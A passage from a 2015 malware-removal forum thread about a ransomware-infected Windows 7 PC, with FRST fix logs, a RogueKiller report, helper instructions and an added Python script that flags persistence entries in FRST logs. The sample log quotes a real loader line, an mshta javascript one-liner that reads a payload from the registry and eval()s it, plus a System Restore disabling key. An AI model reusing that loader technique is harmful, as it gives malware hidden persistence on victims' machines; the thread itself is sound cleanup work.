AlternateDataStreams: C:\ProgramData\Microsoft:er7Z6YcKSZpsAnbNiAs9nu4Y
AlternateDataStreams: C:\Users\KW\Cookies:8Cf9Q91WWNGZLUUlFb4AQuDRHLBm
AlternateDataStreams: C:\Users\KW\Cookies:Ni6hbrdQGoIWWA8FzMivntYD
AlternateDataStreams: C:\Users\KW\Local Settings:init
AlternateDataStreams: C:\Users\KW\AppData\Local:init
AlternateDataStreams: C:\Users\KW\AppData\Local\Application Data:init
AlternateDataStreams: C:\Users\KW\AppData\Local\Temporary Internet Files:puluywQBOvJITXRnmnlZvT
C:\Users\KW\AppData\Roaming\IJFXTJV.exe
C:\Users\KW\AppData\Local\Temp\launchie.vbs
C:\Users\KW\AppData\Roaming\SXQHCMK.exe
C:\Users\KW\AppData\Roaming\DZZPF.exe
C:\Users\KW\AppData\Roaming\FECWQT.exe
C:\Windows\SysWOW64\C2MP
C:\Users\KW\AppData\Roaming\popry-a.exe
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CodecPackTrayMenu.lnk
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_mbeso.txt
C:\Users\KW\Documents\howto_recover_file_mbeso.html
C:\Users\KW\Documents\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.html
C:\Users\KW\AppData\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\LocalLow\howto_recover_file_mbeso.html
C:\Users\KW\AppData\LocalLow\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\Local\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Local\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\Local\Apps\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Local\Apps\howto_recover_file_mbeso.txt
C:\ProgramData\howto_recover_file_mbeso.html
C:\ProgramData\howto_recover_file_mbeso.txt
C:\Users\Public\Documents\howto_recover_file_mbeso.html
C:\Users\Public\Documents\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.txt
C:\Users\KW\AppData\Local\howto_recover_file_mbeso.html
C:\Users\KW\AppData\Local\howto_recover_file_mbeso.txt
C:\ProgramData\howto_recover_file_mbeso.html
C:\Users\KW\nsrulzde.exe
C:\Users\KW\AppData\Local\Temp\Quarantine.exe
C:\Users\KW\AppData\Local\Temp\sonarinst.exe
C:\Users\KW\AppData\Local\Temp\sqlite3.dll

End
*****************

Restore point was successfully created.
Processes closed successfully.
[2780] C:\Users\KW\AppData\Roaming\popry-a.exe => process closed successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\codec Settings UAC Manager => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\Babakan => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\qewr2342 => value removed successfully
"HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore" => key removed successfully
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\Software\Microsoft\Windows\CurrentVersion\Run\\MSConfig => value removed successfully
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\Software\Microsoft\Windows\CurrentVersion\Run\\qewr2342 => value removed successfully
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\Software\Microsoft\Windows\CurrentVersion\Run\\**7fae0a5e<*> => value removed successfully
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\Software\Microsoft\Windows\CurrentVersion\Run\\**ca7e5942<*> => value removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CodecPackTrayMenu.lnk => moved successfully
C:\Windows\SysWOW64\C2MP\TrayMenu.exe => not found.
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_mbeso.html => moved successfully
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_mbeso.txt => moved successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
"HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{483830EE-A4CD-4b71-B0A3-3D82E62A6909}" => key removed successfully
HKCR\CLSID\{483830EE-A4CD-4b71-B0A3-3D82E62A6909} => key not found.
HKU\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
HKU\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => key removed successfully
"HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE" => key removed successfully
"HKLM\Software\Wow6432Node\MozillaPlugins\@t.garena.com/garenatalk" => key removed successfully
C:\Users\KW\AppData\Roaming\Mozilla\Firefox\Profiles\kfpcf5c9.default\searchplugins\howto_recover_file_mbeso.html => moved successfully
C:\Users\KW\AppData\Roaming\Mozilla\Firefox\Profiles\kfpcf5c9.default\searchplugins\howto_recover_file_mbeso.txt => moved successfully
GalaxyClientService => service removed successfully
PinnacleUpdateSvc => service removed successfully
Secunia PSI Agent => service removed successfully
cleanhlp => service removed successfully
NvStUSB => service removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{4811701C-FA0B-475F-BC94-B931A8442A1C}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4811701C-FA0B-475F-BC94-B931A8442A1C}" => key removed successfully
C:\Windows\System32\Tasks\IJFXTJV => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\IJFXTJV" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4D6E08EF-71B0-4FE1-99B9-3F6B34438E95}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4D6E08EF-71B0-4FE1-99B9-3F6B34438E95}" => key removed successfully
C:\Windows\System32\Tasks\4343 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\4343" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{62D75B3F-795C-40D3-83BE-45B8F4101BCF}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{62D75B3F-795C-40D3-83BE-45B8F4101BCF}" => key removed successfully
C:\Windows\System32\Tasks\SXQHCMK => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SXQHCMK" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{6E80BDEB-B02F-43C6-A0A3-7A7E287BB12B}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6E80BDEB-B02F-43C6-A0A3-7A7E287BB12B}" => key removed successfully
C:\Windows\System32\Tasks\DZZPF => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DZZPF" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7009D75B-6D4C-4599-9BFF-9189E5E3A946}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7009D75B-6D4C-4599-9BFF-9189E5E3A946}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AdobeFlashPlayerUpdate" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{958954B3-7CA1-4897-9FBD-CDC081C1F5B6}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{958954B3-7CA1-4897-9FBD-CDC081C1F5B6}" => key removed successfully
C:\Windows\System32\Tasks\FECWQT => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FECWQT" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A911910C-5B46-492B-8E9B-A5C37E9BE803}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A911910C-5B46-492B-8E9B-A5C37E9BE803}" => key removed successfully
C:\Windows\System32\Tasks\0 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\0" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{B8687491-B4A9-4E61-B701-C84380BEB419}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B8687491-B4A9-4E61-B701-C84380BEB419}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AdobeFlashPlayerUpdate 2" => key removed successfully
C:\Windows\Tasks\DZZPF.job => moved successfully
C:\Windows\Tasks\FECWQT.job => moved successfully
C:\Windows\Tasks\IJFXTJV.job => moved successfully
C:\Windows\Tasks\SXQHCMK.job => moved successfully
"C:\Windows\SysWOW64\zlib.dll" => ":DocumentSummaryInformation" ADS not found.
"C:\Windows\SysWOW64\zlib.dll" => ":SummaryInformation" ADS not found.
C:\Windows\SysWOW64\zlib.dll => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully.
C:\ProgramData\Microsoft => ":1JUrhqBxzVBn2oXHbF3idLRjdaK" ADS removed successfully.
C:\ProgramData\Microsoft => ":Bw0yU4h7WSa9zkLTBQbP" ADS removed successfully.
C:\ProgramData\Microsoft => ":er7Z6YcKSZpsAnbNiAs9nu4Y" ADS removed successfully.
"C:\Users\KW\Cookies" => ":8Cf9Q91WWNGZLUUlFb4AQuDRHLBm" ADS not found.
"C:\Users\KW\Cookies" => ":Ni6hbrdQGoIWWA8FzMivntYD" ADS not found.
"C:\Users\KW\Local Settings" => ":init" ADS not found.
C:\Users\KW\AppData\Local => ":init" ADS removed successfully.
"C:\Users\KW\AppData\Local\Application Data" => ":init" ADS not found.
"C:\Users\KW\AppData\Local\Temporary Internet Files" => ":puluywQBOvJITXRnmnlZvT" ADS not found.
"C:\Users\KW\AppData\Roaming\IJFXTJV.exe" => not found.
"C:\Users\KW\AppData\Local\Temp\launchie.vbs" => not found.
"C:\Users\KW\AppData\Roaming\SXQHCMK.exe" => not found.
"C:\Users\KW\AppData\Roaming\DZZPF.exe" => not found.
"C:\Users\KW\AppData\Roaming\FECWQT.exe" => not found.
C:\Windows\SysWOW64\C2MP => moved successfully
C:\Users\KW\AppData\Roaming\popry-a.exe => moved successfully
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CodecPackTrayMenu.lnk" => not found.
"C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_mbeso.html" => not found.
"C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_mbeso.txt" => not found.
C:\Users\KW\Documents\howto_recover_file_mbeso.html => moved successfully
C:\Users\KW\Documents\howto_recover_file_mbeso.txt => moved successfully
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\howto_recover_file_mbeso.html => moved successfully
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\howto_recover_file_mbeso.html => moved successfully
C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.html => moved successfully
C:\Users\KW\AppData\howto_recover_file_mbeso.html => moved successfully
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\howto_recover_file_mbeso.txt => moved successfully
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\howto_recover_file_mbeso.txt => moved successfully
C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.txt => moved successfully
C:\Users\KW\AppData\howto_recover_file_mbeso.txt => moved successfully
C:\Users\KW\AppData\LocalLow\howto_recover_file_mbeso.html => moved successfully
C:\Users\KW\AppData\LocalLow\howto_recover_file_mbeso.txt => moved successfully
C:\Users\KW\AppData\Local\howto_recover_file_mbeso.html => moved successfully
C:\Users\KW\AppData\Local\howto_recover_file_mbeso.txt => moved successfully
C:\Users\KW\AppData\Local\Apps\howto_recover_file_mbeso.html => moved successfully
C:\Users\KW\AppData\Local\Apps\howto_recover_file_mbeso.txt => moved successfully
C:\ProgramData\howto_recover_file_mbeso.html => moved successfully
C:\ProgramData\howto_recover_file_mbeso.txt => moved successfully
C:\Users\Public\Documents\howto_recover_file_mbeso.html => moved successfully
C:\Users\Public\Documents\howto_recover_file_mbeso.txt => moved successfully
"C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.html" => not found.
"C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.txt" => not found.
"C:\Users\KW\AppData\Local\howto_recover_file_mbeso.html" => not found.
"C:\Users\KW\AppData\Local\howto_recover_file_mbeso.txt" => not found.
"C:\ProgramData\howto_recover_file_mbeso.html" => not found.
C:\Users\KW\nsrulzde.exe => moved successfully
C:\Users\KW\AppData\Local\Temp\Quarantine.exe => Error: No automatic fix found for this entry.
C:\Users\KW\AppData\Local\Temp\sonarinst.exe => moved successfully
C:\Users\KW\AppData\Local\Temp\sqlite3.dll => moved successfully
EmptyTemp: => 26 GB temporary data Removed.

The system needed a reboot.

==== End of Fixlog 15:00:43 ====
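The entries FRST marked ATTENTION above fall into a handful of recognisable patterns: Run values that launch a script host (here mshta with an inline javascript: URL that reads the real payload out of the registry value HKCU\software\e73cf62062\8b3a4602 and eval()s it), tasks and Run values whose targets live under AppData, Temp or the profile root, the policy key that disables System Restore, ransom notes dropped into the Startup and Firefox search-plugin folders, and random-named alternate data streams on directories such as ProgramData\Microsoft. The Python below is an added example, not part of the thread and not FRST's own code. It runs those checks over constructed log lines modelled on the ones posted (plus one benign Realtek control line that does not appear on the page), pulls out the registry path an mshta one-liner reads so it can be exported before the Run value is deleted, and drafts a fixlist in the Start / CloseProcesses: / End layout the thread uses. The rule names and the set of stream names treated as benign are this example's own assumptions.

```python
"""Triage FRST log lines for the persistence patterns seen in this thread.

Added example: not part of the original thread and not FRST's own code.
SAMPLE_LOG is constructed to mirror entries quoted in the thread, plus one
benign Realtek control line that does not appear on the page. Rule names and
the fixlist layout are this example's own assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample, shaped like the FRST entries quoted in the thread.
SAMPLE_LOG = r"""
HKLM-x32\...\Run: [qewr2342] => C:\Users\KW\AppData\Roaming\popry-a.exe [466944 2015-11-09] ()
HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR/DisableConfig]  <===== ATTENTION
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [**7fae0a5e<*>] => mshta javascript:zV49=new%20ActiveXObject("WScript.Shell");RFfX53=zV49.RegRead("HKCU\\software\\e73cf62062\\8b3a4602");eval(RFfX53); <===== ATTENTION (Value Name with invalid characters)
Startup: C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_mbeso.txt [2015-11-09] ()
Task: {4D6E08EF-71B0-4FE1-99B9-3F6B34438E95} - System32\Tasks\4343 => Wscript.exe C:\Users\KW\AppData\Local\Temp\launchie.vbs //B <==== ATTENTION
Task: {4811701C-FA0B-475F-BC94-B931A8442A1C} - System32\Tasks\IJFXTJV => C:\Users\KW\AppData\Roaming\IJFXTJV.exe <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Microsoft:1JUrhqBxzVBn2oXHbF3idLRjdaK
AlternateDataStreams: C:\Windows\SysWOW64\zlib.dll:SummaryInformation
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13672088 2014-05-15] (Realtek Semiconductor)
"""


@dataclass
class Finding:
    kind: str    # rule name
    detail: str  # what to look at next
    line: str    # the log line that fired the rule


# Script hosts used to run a launcher instead of a plain executable.
SCRIPT_HOST = re.compile(r"\b(mshta|wscript|cscript|powershell|rundll32)(\.exe)?\b", re.I)
# JScript RegRead("...") inside an mshta one-liner: the real payload sits in the registry.
REG_READ = re.compile(r'RegRead\("([^"]+)"\)')
# Executables or scripts living under user-writable locations.
USER_WRITABLE = re.compile(
    r"\\(AppData|ProgramData|Temp|Users\\[^\\]+)\\(?:[^\\]+\\)*[^\\]+\.(exe|vbs|js|scr)\b", re.I)
ADS = re.compile(r"^AlternateDataStreams: (.+):([^:\\]+)$")
# Property-set streams Windows itself writes (assumed benign here); anything else,
# especially a random name on a directory such as ProgramData\Microsoft, deserves a look.
BENIGN_STREAMS = {"SummaryInformation", "DocumentSummaryInformation", "Zone.Identifier"}


def triage(log_text: str) -> list[Finding]:
    """Return one Finding per rule hit; a single line can fire more than one rule."""
    findings: list[Finding] = []
    for raw in log_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if "SystemRestore" in line and "DisableSR" in line:
            findings.append(Finding("system_restore_disabled",
                                    "policy key blocks restore points; remove it first", line))
        if line.startswith(("Startup:", "FF SearchPlugin:")) and "howto_recover_file" in line.lower():
            findings.append(Finding("ransom_note_autostart", "ransom note re-opens at logon", line))
        if "=>" in line:
            target = line.split("=>", 1)[1]
            if SCRIPT_HOST.search(target):
                m = REG_READ.search(target)
                # The log shows JScript-escaped backslashes; collapse them to a real key path.
                detail = ("payload stored in registry at " + m.group(1).replace("\\\\", "\\")
                          if m else "script host launcher")
                findings.append(Finding("script_host_autorun", detail, line))
            if USER_WRITABLE.search(target):
                findings.append(Finding("user_writable_autorun",
                                        "autorun target outside Program Files / Windows", line))
        m = ADS.match(line)
        if m and m.group(2) not in BENIGN_STREAMS:
            findings.append(Finding("suspicious_ads", f"stream '{m.group(2)}' on {m.group(1)}", line))
    return findings


def summarize(findings: list[Finding]) -> dict[str, int]:
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.kind] = counts.get(f.kind, 0) + 1
    return counts


def registry_payloads(findings: list[Finding]) -> list[str]:
    """Registry values an mshta/eval one-liner reads: export these before wiping the Run entry."""
    prefix = "payload stored in registry at "
    return [f.detail[len(prefix):] for f in findings if f.detail.startswith(prefix)]


def fixlist_preview(findings: list[Finding]) -> list[str]:
    """Draft a fixlist in the layout the thread uses; FRST accepts flagged log lines verbatim.
    Deduplicated and meant for a human to review, not to run unread."""
    body = list(dict.fromkeys(f.line for f in findings))
    return ["Start", "CloseProcesses:", *body, "EmptyTemp:", "End"]


if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for f in found:
        print(f"{f.kind:24} {f.detail}")
    print(summarize(found))
    print("\n".join(fixlist_preview(found)))
```

The mshta line is the one worth pausing on: the Run value only holds a loader, so deleting it without first exporting the registry value it reads loses the artefact that would show what was actually being executed at each logon.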



#4 snapjaw (Topic Starter, Members, 72 posts)

Posted 12 November 2015 - 04:23 PM

Also there is a restore point now. The one FRST just created.

#5 nasdaq (Malware Response Team, 38,569 posts, Montreal, QC. Canada)

Posted 13 November 2015 - 07:46 AM

It didn't really change anything.

Please tell me what the remaining issues are.

#6 snapjaw (Topic Starter, Members, 72 posts)

Posted 13 November 2015 - 01:23 PM

My computer is still slow. The text file telling me about how to recover the files still pops up at start up, as well as an internet browser with the same message.

Text and picture files are still encrypted, though I think new text files I create do not become encrypted now. Also I forgot to mention the pop up about volume shaders used to pop up every 5 seconds after I hit no. Now there are no more volume shader pop ups at all.

#7 snapjaw (Topic Starter, Members, 72 posts)

Posted 13 November 2015 - 01:28 PM

Also I just noticed in the task manager that physical memory is at 92%; way too high.

The big processes are msiexec.exe and three conhost.exe processes. There are a lot of conhost.exe processes that usually are not there.

And a few minutes after start up the physical memory drops to 50%. Still pretty high though.

Edited by snapjaw, 13 November 2015 - 02:12 PM.


#8 nasdaq (Malware Response Team, 38,569 posts, Montreal, QC. Canada)

Posted 14 November 2015 - 09:45 AM

--RogueKiller--
  • Download & SAVE to your Desktop: Download RogueKiller
  • Quit all programs that you may have started.
  • Please disconnect any USB or external drives from the computer before you run this scan!
  • For Vista or Windows 7, right-click and select "Run as Administrator" to start
  • For Windows XP, double-click to start.
  • Wait until Prescan has finished ...
  • When instructed Click on "Scan" button
  • Wait until the Status box shows "Scan Finished"
  • Click on "Report"
  • Click on Export TXT button save the file as RogueReport.txt
  • The file RogueReport.txt will be saved in the desktop.
  • Close the program.
  • Open the file with Notepad and Copy/paste the content into your next reply.
<<<>>>

You will need to temporarily disable your AV program so it does not interfere.
Info on how to disable your security applications: How To Temporarily Disable Your Anti-virus, Firewall And Anti-malware Programs - Security Mini-Guides.

Download the Zoek tool from here

When the download appears, save to the Desktop.
On the Desktop, right-click the Zoek.exe file and select: Run as Administrator
(Give it a few seconds to appear.)

Click the Options button; the following options are available to you.
Select only the check boxes for the options shown in bold in the original post, which are:

Running Processes
Installed Programs
Startup Information
FireFox look
Chrome Look
Auto Clean

The complete list of options is:

Do a Quick Scan
HijackThis log
Uninstall list
Shortcut Fix
Do a Deep Scan
Installer List
IE Default
Silent Runner
System Restore Info
Symlink Check
Reset Chrome
System Specs
Recently created
Empty Temp
Auto Clean



Now...
Close any open Browsers.
Click the Run script button, and wait. It takes a few minutes to run all the script.

When the tool finishes, the zoek-results.log is opened in Notepad.
The log is also found on the systemdrive, normally C:\
If a reboot is needed, the log is opened after the reboot.
Please attach the zoek-results.log in your reply. It's probably too long to post.

How to:
In the Reply section at the bottom of the topic, click the "More Reply Options" button.

Attach the file.
Select "Choose a File" and navigate to the location of the file.
Click the file you wish to attach.

Click the Add Reply button.

Make sure you Enable your AV Program.
===

Any improvement?

#9 snapjaw (Topic Starter, Members, 72 posts)

Posted 14 November 2015 - 04:57 PM

Here is the rogue report.

 

RogueKiller V10.0.8.0 (x64) [Nov 20 2014] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits

version
Started in : Normal mode
User : KW [Administrator]
Mode : Scan -- Date : 11/14/2015  15:33:07

¤¤¤ Processes : 1 ¤¤¤
[Suspicious.Path] igfxCUIService.exe -- C:\ProgramData\igfxCUIService.exe[-] -> Killed [TermProc]

¤¤¤ Registry : 14 ¤¤¤
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-1995585355-2568222046-1999612799-1002\Software\Microsoft\Windows\CurrentVersion\Run | igfxCUIService : "C:\PROGRA~3\igfxCUIService.exe"  -> Found
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-1995585355-2568222046-1999612799-1002\Software\Microsoft\Windows\CurrentVersion\Run | igfxCUIService : "C:\PROGRA~3\igfxCUIService.exe"  -> Found
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\GalaxyCommunication ("C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe") -> Found
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\GalaxyCommunication ("C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe") -> Found
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\GalaxyCommunication ("C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe") -> Found
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-1995585355-2568222046-1999612799-1002\Software\Microsoft\Internet Explorer\Main | Start Page : www.google.com  -> Found
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-1995585355-2568222046-1999612799-1002\Software\Microsoft\Internet Explorer\Main | Start Page : www.google.com  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5722F3C1-0AE8-42B0-B73C-1053D96A8EAE} | DhcpNameServer : 24.93.41.125 24.93.41.126 [UNITED STATES (US)][UNITED STATES (US)]  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{5722F3C1-0AE8-42B0-B73C-1053D96A8EAE} | DhcpNameServer : 24.93.41.125 24.93.41.126 [UNITED STATES (US)][UNITED STATES (US)]  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters\Interfaces\{5722F3C1-0AE8-42B0-B73C-1053D96A8EAE} | DhcpNameServer : 24.93.41.125 24.93.41.126 [UNITED STATES (US)][UNITED STATES (US)]  -> Found
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Found
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> Found
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Found
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> Found

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 0 ¤¤¤

¤¤¤ Hosts File : 1 ¤¤¤
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 idnet.ua-corp.com

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: ST500DM002-1BD142 ATA Device +++++
--- User ---
[MBR] 5916094c8afccd70600599efcac71d12
[BSP] ec01419df5922634e7dbad035685c8a9 : Windows Vista/7/8 MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 500 MB
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 1026048 | Size: 476438 MB
User = LL1 ... OK
User = LL2 ... OK

============================================
RKreport_DEL_12052014_011604.log - RKreport_SCN_12052014_011239.log



#10 snapjaw (Topic Starter, Members, 72 posts)

Posted 14 November 2015 - 05:13 PM

I am trying to run Zoek now but it took like five minutes to open after I hit Run as Administrator.

Edited by snapjaw, 14 November 2015 - 05:17 PM.


#11 snapjaw (Topic Starter, Members, 72 posts)

Posted 14 November 2015 - 06:44 PM

I've attached the zoek-results.txt file. The howto_recover text file still pops up at startup. And my computer seems to be working a little faster now but still not as fast as before the ransomware. My physical memory usage is at 40% right now.

Attached Files



#12 nasdaq (Malware Response Team, 38,569 posts, Montreal, QC. Canada)

Posted 15 November 2015 - 08:53 AM

On the Desktop, right-click the Zoek.exe file and select: Run as Administrator
(Give it a few seconds to appear.)

Next, copy/paste the entire script inside the code box below to the input field of Zoek:
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_wkbap.html
C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_wkbap.txt
undetermined - KW\AppData\Local\Google\Chrome\User Data\Default\Extensions\howto_recover_file_mbeso.html
undetermined - KW\AppData\Local\Google\Chrome\User Data\Default\Extensions\howto_recover_file_mbeso.txt
undetermined - KW\AppData\Local\Google\Chrome\User Data\Default\Extensions\howto_recover_file_wkbap.html
undetermined - KW\AppData\Local\Google\Chrome\User Data\Default\Extensions\howto_recover_file_wkbap.txt
HKLM\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} - http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7
HKLM\Wow6432Node\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} - http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7
HKCU\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} - http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7&rlz=1I7AURU_enUS501

Now...
Close any open Browsers.
Click the Run script button, and wait. It takes a few minutes to run all the script.

